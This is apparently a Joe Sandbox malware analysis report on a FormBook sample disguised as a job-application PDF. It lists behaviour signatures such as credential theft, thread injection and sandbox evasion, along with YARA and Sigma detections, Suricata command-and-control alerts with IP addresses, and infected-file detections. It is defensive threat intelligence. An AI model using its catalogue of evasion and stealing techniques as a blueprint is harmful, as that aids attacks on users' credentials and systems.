Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
CV_Sales Representative - Job Request PDF.exe

Overview

General Information

Sample name:CV_Sales Representative - Job Request PDF.exe
Analysis ID:1638116
MD5:f37f105143a4803e3315106d66cd3a99
SHA1:1be61d66bcf561e7713922b82fc5be40bc9c1599
SHA256:463a99c4d82f346dd9cb1236df6c6acd9dc5f5df50467848efa167b59c635120
Tags:exeWormm0yvuser-lowmal3
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
Binary is likely a compiled AutoIt script file
Creates files inside the volume driver (system volume information)
Drops executable to a common third party application directory
Found direct / indirect Syscall (likely to bypass EDR)
Infects executable files (exe, dll, sys, html)
Joe Sandbox ML detected suspicious sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queries random domain names (often used to prevent blacklisting and sinkholes)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Connects to many different domains
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates processes with suspicious names
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Enables driver privileges
Enables security privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Queries time zone information
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Uncommon Svchost Parent Process
Spawns drivers
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • CV_Sales Representative - Job Request PDF.exe (PID: 7620 cmdline: "C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exe" MD5: F37F105143A4803E3315106D66CD3A99)
    • svchost.exe (PID: 7728 cmdline: "C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • 7EFPjTEjLAB4.exe (PID: 5700 cmdline: "C:\Program Files (x86)\PHsZOyhkvmyMgxGRQbGJyoAgpElJFVCBrczssQOTLQGakVYlxbbKdoeVWDs\3BpMquwWFYm.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
        • mfpmp.exe (PID: 1208 cmdline: "C:\Windows\SysWOW64\mfpmp.exe" MD5: 9CD65F38A2B4E53E8180395DE4988D6A)
          • 7EFPjTEjLAB4.exe (PID: 6152 cmdline: "C:\Program Files (x86)\PHsZOyhkvmyMgxGRQbGJyoAgpElJFVCBrczssQOTLQGakVYlxbbKdoeVWDs\4385XavJzoz.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
  • armsvc.exe (PID: 7644 cmdline: "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe" MD5: 6C099CD2CED3D47DD21428D9C72629D3)
  • alg.exe (PID: 7688 cmdline: C:\Windows\System32\alg.exe MD5: E83065A0C793163DE94A60C4B9F97AB3)
  • AppVStrm.sys (PID: 4 cmdline: MD5: BDA55F89B69757320BC125FF1CB53B26)
  • AppvVemgr.sys (PID: 4 cmdline: MD5: E70EE9B57F8D771E2F4D6E6B535F6757)
  • AppvVfs.sys (PID: 4 cmdline: MD5: 2CBABD729D5E746B6BD8DC1B4B4DB1E1)
  • AppVClient.exe (PID: 7748 cmdline: C:\Windows\system32\AppVClient.exe MD5: 0695A9EB600CEEF4AAEBBF9D1F8A9EEE)
  • FXSSVC.exe (PID: 7852 cmdline: C:\Windows\system32\fxssvc.exe MD5: CE6B7EC1D3FBA7B46B46B2861DEC2B57)
  • elevation_service.exe (PID: 8104 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe" MD5: AC4A4927C418C8C0106D66AD86E7C569)
  • maintenanceservice.exe (PID: 8148 cmdline: "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe" MD5: 9A0D2898DC68040CDB848643A337FF6D)
  • msdtc.exe (PID: 8184 cmdline: C:\Windows\System32\msdtc.exe MD5: 180632CE73EF2684FB58B10998ADFFF0)
  • PerceptionSimulationService.exe (PID: 7384 cmdline: C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe MD5: 779608D3969C95828FAFA7F0741B505F)
  • perfhost.exe (PID: 1252 cmdline: C:\Windows\SysWow64\perfhost.exe MD5: 22311C7ECABAD76518A2FB7B2FB75ADF)
  • Locator.exe (PID: 7760 cmdline: C:\Windows\system32\locator.exe MD5: 1FC61ACF7E93FD963C2B94565A7535BA)
  • SensorDataService.exe (PID: 5740 cmdline: C:\Windows\System32\SensorDataService.exe MD5: B09433CC1C2BD1CA671C66999DDDBB4D)
  • snmptrap.exe (PID: 7372 cmdline: C:\Windows\System32\snmptrap.exe MD5: 724F76348A106F214F0AF00765C94733)
  • Spectrum.exe (PID: 1464 cmdline: C:\Windows\system32\spectrum.exe MD5: D847760F14BCCB3322C5C299BB0DD5ED)
  • ssh-agent.exe (PID: 8268 cmdline: C:\Windows\System32\OpenSSH\ssh-agent.exe MD5: E22271930FDDC9BF7328C6E0864FE9C2)
  • TieringEngineService.exe (PID: 8312 cmdline: C:\Windows\system32\TieringEngineService.exe MD5: B7A99C06D9D715E843942E73DD9D36D8)
  • AgentService.exe (PID: 8404 cmdline: C:\Windows\system32\AgentService.exe MD5: 70E7E33525470B56100364A204AC5909)
  • vds.exe (PID: 8424 cmdline: C:\Windows\System32\vds.exe MD5: FCEFD36730A69FA9316AFA382E952675)
  • wbengine.exe (PID: 8512 cmdline: "C:\Windows\system32\wbengine.exe" MD5: DD0F83C1A95D0A09A6095E5486D2C64F)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.1356343056.0000000003D50000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000003.00000002.1351634880.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000019.00000002.2445449912.00000000033D0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000003.00000002.1356486981.0000000003DA0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000026.00000002.2456798324.00000000054F0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Execution of Suspicious File Type Extension
            Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: , CommandLine: , CommandLine|base64offset|contains: , Image: C:\Windows\System32\drivers\AppVStrm.sys, NewProcessName: C:\Windows\System32\drivers\AppVStrm.sys, OriginalFileName: C:\Windows\System32\drivers\AppVStrm.sys, ParentCommandLine: , ParentImage: , ParentProcessId: -1, ProcessCommandLine: , ProcessId: 4, ProcessName: AppVStrm.sys
            Sigma detected: Uncommon Svchost Parent Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exe", CommandLine: "C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exe", CommandLine|base64offset|contains: Ekzb, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exe", ParentImage: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exe, ParentProcessId: 7620, ParentProcessName: CV_Sales Representative - Job Request PDF.exe, ProcessCommandLine: "C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exe", ProcessId: 7728, ProcessName: svchost.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exe", CommandLine: "C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exe", CommandLine|base64offset|contains: Ekzb, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exe", ParentImage: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exe, ParentProcessId: 7620, ParentProcessName: CV_Sales Representative - Job Request PDF.exe, ProcessCommandLine: "C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exe", ProcessId: 7728, ProcessName: svchost.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-14T08:25:00.389304+010020516511A Network Trojan was detected192.168.2.4635501.1.1.153UDP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-14T08:23:16.794291+010020516491A Network Trojan was detected192.168.2.4614601.1.1.153UDP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-14T08:23:14.951072+010020516481A Network Trojan was detected192.168.2.4609731.1.1.153UDP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-14T08:23:42.963390+010020507451Malware Command and Control Activity Detected192.168.2.45392213.248.169.4880TCP
            2025-03-14T08:24:06.194991+010020507451Malware Command and Control Activity Detected192.168.2.45393613.248.169.4880TCP
            2025-03-14T08:24:19.493342+010020507451Malware Command and Control Activity Detected192.168.2.453950199.59.243.16080TCP
            2025-03-14T08:24:32.783612+010020507451Malware Command and Control Activity Detected192.168.2.45396713.248.169.4880TCP
            2025-03-14T08:24:46.136962+010020507451Malware Command and Control Activity Detected192.168.2.45398513.248.169.4880TCP
            2025-03-14T08:24:59.355270+010020507451Malware Command and Control Activity Detected192.168.2.45400313.248.169.4880TCP
            2025-03-14T08:25:19.953923+010020507451Malware Command and Control Activity Detected192.168.2.45402237.27.60.10980TCP
            2025-03-14T08:25:33.449349+010020507451Malware Command and Control Activity Detected192.168.2.45402613.248.169.4880TCP
            2025-03-14T08:25:46.898875+010020507451Malware Command and Control Activity Detected192.168.2.454030203.161.60.16180TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-14T08:23:12.991633+010020181411A Network Trojan was detected13.213.51.19680192.168.2.449723TCP
            2025-03-14T08:23:13.915611+010020181411A Network Trojan was detected52.11.240.23980192.168.2.449724TCP
            2025-03-14T08:23:14.948061+010020181411A Network Trojan was detected3.229.117.5780192.168.2.449728TCP
            2025-03-14T08:24:09.519954+010020181411A Network Trojan was detected13.214.183.6180192.168.2.453938TCP
            2025-03-14T08:24:15.602981+010020181411A Network Trojan was detected34.245.175.18780192.168.2.453945TCP
            2025-03-14T08:24:16.530289+010020181411A Network Trojan was detected34.227.7.13880192.168.2.453946TCP
            2025-03-14T08:24:22.729967+010020181411A Network Trojan was detected52.43.119.12080192.168.2.453953TCP
            2025-03-14T08:24:42.145173+010020181411A Network Trojan was detected52.26.80.13380192.168.2.453978TCP
            2025-03-14T08:24:42.851904+010020181411A Network Trojan was detected54.85.87.18480192.168.2.453980TCP
            2025-03-14T08:24:44.694120+010020181411A Network Trojan was detected52.212.150.5480192.168.2.453983TCP
            2025-03-14T08:24:50.030151+010020181411A Network Trojan was detected47.129.31.21280192.168.2.453989TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-14T08:23:12.991633+010020377711A Network Trojan was detected13.213.51.19680192.168.2.449723TCP
            2025-03-14T08:23:13.915611+010020377711A Network Trojan was detected52.11.240.23980192.168.2.449724TCP
            2025-03-14T08:23:14.948061+010020377711A Network Trojan was detected3.229.117.5780192.168.2.449728TCP
            2025-03-14T08:24:09.519954+010020377711A Network Trojan was detected13.214.183.6180192.168.2.453938TCP
            2025-03-14T08:24:15.602981+010020377711A Network Trojan was detected34.245.175.18780192.168.2.453945TCP
            2025-03-14T08:24:16.530289+010020377711A Network Trojan was detected34.227.7.13880192.168.2.453946TCP
            2025-03-14T08:24:22.729967+010020377711A Network Trojan was detected52.43.119.12080192.168.2.453953TCP
            2025-03-14T08:24:42.145173+010020377711A Network Trojan was detected52.26.80.13380192.168.2.453978TCP
            2025-03-14T08:24:42.851904+010020377711A Network Trojan was detected54.85.87.18480192.168.2.453980TCP
            2025-03-14T08:24:44.694120+010020377711A Network Trojan was detected52.212.150.5480192.168.2.453983TCP
            2025-03-14T08:24:50.030151+010020377711A Network Trojan was detected47.129.31.21280192.168.2.453989TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-14T08:23:42.963390+010028554651A Network Trojan was detected192.168.2.45392213.248.169.4880TCP
            2025-03-14T08:24:06.194991+010028554651A Network Trojan was detected192.168.2.45393613.248.169.4880TCP
            2025-03-14T08:24:19.493342+010028554651A Network Trojan was detected192.168.2.453950199.59.243.16080TCP
            2025-03-14T08:24:32.783612+010028554651A Network Trojan was detected192.168.2.45396713.248.169.4880TCP
            2025-03-14T08:24:46.136962+010028554651A Network Trojan was detected192.168.2.45398513.248.169.4880TCP
            2025-03-14T08:24:59.355270+010028554651A Network Trojan was detected192.168.2.45400313.248.169.4880TCP
            2025-03-14T08:25:19.953923+010028554651A Network Trojan was detected192.168.2.45402237.27.60.10980TCP
            2025-03-14T08:25:33.449349+010028554651A Network Trojan was detected192.168.2.45402613.248.169.4880TCP
            2025-03-14T08:25:46.898875+010028554651A Network Trojan was detected192.168.2.454030203.161.60.16180TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-14T08:23:58.554957+010028554641A Network Trojan was detected192.168.2.45393213.248.169.4880TCP
            2025-03-14T08:24:01.149346+010028554641A Network Trojan was detected192.168.2.45393313.248.169.4880TCP
            2025-03-14T08:24:04.711475+010028554641A Network Trojan was detected192.168.2.45393413.248.169.4880TCP
            2025-03-14T08:24:11.813698+010028554641A Network Trojan was detected192.168.2.453941199.59.243.16080TCP
            2025-03-14T08:24:14.398980+010028554641A Network Trojan was detected192.168.2.453943199.59.243.16080TCP
            2025-03-14T08:24:16.970242+010028554641A Network Trojan was detected192.168.2.453947199.59.243.16080TCP
            2025-03-14T08:24:25.041427+010028554641A Network Trojan was detected192.168.2.45395713.248.169.4880TCP
            2025-03-14T08:24:27.583183+010028554641A Network Trojan was detected192.168.2.45396013.248.169.4880TCP
            2025-03-14T08:24:30.246024+010028554641A Network Trojan was detected192.168.2.45396413.248.169.4880TCP
            2025-03-14T08:24:39.336661+010028554641A Network Trojan was detected192.168.2.45397313.248.169.4880TCP
            2025-03-14T08:24:40.957136+010028554641A Network Trojan was detected192.168.2.45397713.248.169.4880TCP
            2025-03-14T08:24:43.883560+010028554641A Network Trojan was detected192.168.2.45398213.248.169.4880TCP
            2025-03-14T08:24:51.736449+010028554641A Network Trojan was detected192.168.2.45399213.248.169.4880TCP
            2025-03-14T08:24:54.270460+010028554641A Network Trojan was detected192.168.2.45399513.248.169.4880TCP
            2025-03-14T08:24:56.786751+010028554641A Network Trojan was detected192.168.2.45399713.248.169.4880TCP
            2025-03-14T08:25:06.125819+010028554641A Network Trojan was detected192.168.2.45401037.27.60.10980TCP
            2025-03-14T08:25:08.691466+010028554641A Network Trojan was detected192.168.2.45401437.27.60.10980TCP
            2025-03-14T08:25:11.214393+010028554641A Network Trojan was detected192.168.2.45401837.27.60.10980TCP
            2025-03-14T08:25:25.493649+010028554641A Network Trojan was detected192.168.2.45402313.248.169.4880TCP
            2025-03-14T08:25:28.137896+010028554641A Network Trojan was detected192.168.2.45402413.248.169.4880TCP
            2025-03-14T08:25:31.789877+010028554641A Network Trojan was detected192.168.2.45402513.248.169.4880TCP
            2025-03-14T08:25:39.206583+010028554641A Network Trojan was detected192.168.2.454027203.161.60.16180TCP
            2025-03-14T08:25:41.693917+010028554641A Network Trojan was detected192.168.2.454028203.161.60.16180TCP
            2025-03-14T08:25:44.345451+010028554641A Network Trojan was detected192.168.2.454029203.161.60.16180TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-14T08:23:09.977172+010028508511Malware Command and Control Activity Detected192.168.2.44972052.11.240.23980TCP
            2025-03-14T08:24:29.455801+010028508511Malware Command and Control Activity Detected192.168.2.45396213.213.51.19680TCP
            2025-03-14T08:25:01.830035+010028508511Malware Command and Control Activity Detected192.168.2.45400513.213.51.19680TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: CV_Sales Representative - Job Request PDF.exeAvira: detected
            Antivirus detection for dropped file
            Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeAvira: detection malicious, Label: W32/Infector.Gen
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exeAvira: detection malicious, Label: W32/Infector.Gen
            Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeAvira: detection malicious, Label: W32/Infector.Gen
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exeAvira: detection malicious, Label: W32/Infector.Gen
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeAvira: detection malicious, Label: W32/Infector.Gen
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeAvira: detection malicious, Label: W32/Infector.Gen
            Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeAvira: detection malicious, Label: W32/Infector.Gen
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exeAvira: detection malicious, Label: W32/Infector.Gen
            Source: C:\Program Files (x86)\AutoIt3\Au3Check.exeAvira: detection malicious, Label: W32/Infector.Gen
            Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeAvira: detection malicious, Label: W32/Infector.Gen
            Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeAvira: detection malicious, Label: W32/Infector.Gen
            Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeAvira: detection malicious, Label: W32/Infector.Gen
            Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeAvira: detection malicious, Label: W32/Infector.Gen
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeAvira: detection malicious, Label: W32/Infector.Gen
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exeAvira: detection malicious, Label: W32/Infector.Gen
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeAvira: detection malicious, Label: W32/Infector.Gen
            Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeAvira: detection malicious, Label: W32/Infector.Gen
            Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeAvira: detection malicious, Label: W32/Infector.Gen
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeAvira: detection malicious, Label: W32/Infector.Gen
            Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeAvira: detection malicious, Label: W32/Infector.Gen
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exeAvira: detection malicious, Label: W32/Infector.Gen
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeAvira: detection malicious, Label: W32/Infector.Gen
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exeAvira: detection malicious, Label: W32/Infector.Gen
            Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeAvira: detection malicious, Label: W32/Infector.Gen
            Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeAvira: detection malicious, Label: W32/Infector.Gen
            Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeAvira: detection malicious, Label: W32/Infector.Gen
            Source: C:\Program Files (x86)\Google\GoogleUpdater\135.0.7023.0\updater.exeAvira: detection malicious, Label: W32/Infector.Gen
            Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeAvira: detection malicious, Label: W32/Infector.Gen
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exeAvira: detection malicious, Label: W32/Infector.Gen
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exeAvira: detection malicious, Label: W32/Infector.Gen
            Source: C:\Program Files (x86)\AutoIt3\Au3Info.exeAvira: detection malicious, Label: W32/Infector.Gen
            Multi AV Scanner detection for submitted file
            Source: CV_Sales Representative - Job Request PDF.exeVirustotal: Detection: 80%Perma Link
            Source: CV_Sales Representative - Job Request PDF.exeReversingLabs: Detection: 84%
            Yara detected FormBook
            Source: Yara matchFile source: 00000003.00000002.1356343056.0000000003D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1351634880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000019.00000002.2445449912.00000000033D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1356486981.0000000003DA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000026.00000002.2456798324.00000000054F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000019.00000002.2410421915.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000019.00000002.2419943253.0000000003180000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.2445724285.0000000002FB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Joe Sandbox ML detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: CV_Sales Representative - Job Request PDF.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb77.GCTL source: armsvc.exe, 00000001.00000003.1762652955.0000000001CB0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: CV_Sales Representative - Job Request PDF.exe, 00000000.00000003.1163189385.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdb source: armsvc.exe, 00000001.00000003.1831946567.0000000000660000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1822894017.0000000000940000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1821670882.0000000000940000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: msiexec.pdb source: armsvc.exe, 00000001.00000003.1240058581.0000000002030000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb source: armsvc.exe, 00000001.00000003.1446513434.0000000001CC0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: ssh-agent.pdb source: armsvc.exe, 00000001.00000003.1309434456.0000000002030000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb444 source: armsvc.exe, 00000001.00000003.1595997074.0000000002040000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb source: armsvc.exe, 00000001.00000003.1595997074.0000000002040000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: ADelRCP_Exec.pdb source: armsvc.exe, 00000001.00000003.1617904713.0000000002040000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: msiexec.pdbGCTL source: armsvc.exe, 00000001.00000003.1240058581.0000000002030000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\jjs_objs\jjs.pdb source: jjs.exe.1.dr
            Source: Binary string: mavinject32.pdbGCTL source: armsvc.exe, 00000001.00000003.1872883015.0000000000980000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1869670293.00000000009A0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: PresentationFontCache.pdb source: armsvc.exe, 00000001.00000003.1192730867.00000000019E0000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 0000000B.00000003.2364725219.0000000000830000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: PerceptionSimulationService.pdb source: armsvc.exe, 00000001.00000003.1251228515.0000000002030000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: MFPMP.pdbUGP source: svchost.exe, 00000003.00000003.1319266499.0000000003424000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1318579187.000000000341B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1319168683.000000000341A000.00000004.00000020.00020000.00000000.sdmp, 7EFPjTEjLAB4.exe, 00000017.00000002.2433723996.00000000013EE000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: CV_Sales Representative - Job Request PDF.exe, 00000000.00000003.1172554244.00000000041C0000.00000004.00001000.00020000.00000000.sdmp, CV_Sales Representative - Job Request PDF.exe, 00000000.00000003.1173875272.0000000004BF0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000003.00000003.1249385488.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1354602493.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1251663225.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1354602493.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, mfpmp.exe, 00000019.00000003.1357310872.00000000034A6000.00000004.00000020.00020000.00000000.sdmp, mfpmp.exe, 00000019.00000002.2448881491.00000000037EE000.00000040.00001000.00020000.00000000.sdmp, mfpmp.exe, 00000019.00000003.1352886352.00000000032D4000.00000004.00000020.00020000.00000000.sdmp, mfpmp.exe, 00000019.00000002.2448881491.0000000003650000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdb source: armsvc.exe, 00000001.00000003.1537138014.0000000002040000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\rmiregistry_objs\rmiregistry.pdb source: rmiregistry.exe.1.dr
            Source: Binary string: Spectrum.pdb source: Spectrum.exe.1.dr
            Source: Binary string: D:\a\_work\e\src\out\Release_x64\notification_helper.exe.pdb source: notification_click_helper.exe.1.dr
            Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdbAAAGCTL source: armsvc.exe, 00000001.00000003.1755290977.0000000002040000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: MsSense.pdbGCTL source: armsvc.exe, 00000001.00000003.1276391483.0000000002030000.00000004.00001000.00020000.00000000.sdmp
